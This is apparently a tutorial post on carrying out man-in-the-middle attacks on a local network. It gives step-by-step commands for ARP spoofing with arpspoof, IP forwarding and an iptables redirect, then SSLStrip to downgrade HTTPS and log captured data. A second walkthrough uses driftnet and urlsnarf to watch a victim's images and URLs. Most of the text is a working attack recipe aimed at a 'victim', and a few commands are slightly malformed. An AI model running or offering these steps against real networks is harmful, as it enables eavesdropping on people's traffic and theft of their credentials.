Man in the middle attack for SSL connection
During this type of attack two parties are communicating with one another and hacker inserts itself into the conversation and attempts to alter or eavesdrop on the conversation. The attacker has to be able to sniff traffic between the two parties. We will look at performing man in the middle attack using utility called SSLStrip. We are using kali linux distribution as it already comes with all necessary tools installed.

Utilities used

1. Enable IP forwarding so all traffic go through our host or user will loose connectivity

echo 1 > /proc/sys/net/ipv4/ip_forward

2. In order to tell the victim host that now we (our MAC address) are the one belonging to the IP of the gateway enter the following command:

# arpspoof -t victim gateway

In a seperate shell we start the matching command to fool gateway to belive we are victim.

# arpspoof -t gateway victim

3. Setup firewall rule on the system to redirect traffic from port 80 to port 8080

iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT -to-port 8080

4. Run sslstrip

sslstrip -l 8080

5. Access any ssl website on the target and then Ctrl+c to stop test. View sslstrip.log file and see information gathered.

Example of Man in the middle attack with driftnet and urlsnarf
We will try to view images that are being displayed on victim systems via web browser. In order to do this we will be running Man in the middle attack.


1. If you need to discover IP addresses you can scan subnet with nmap. If you already know your target then go to step 2.

sudo nmap -sP

2. On your system from which you want to run Man in the Middle Attack run 3 terminal windows and in each of them run following commands

sudo arpspoof -i eth0 -t
sudo arpspoof -i eth0 -t
sudo driftnet -i eth0

3. To catch URL’s you run the following command

sudo urlsnarf -i eth0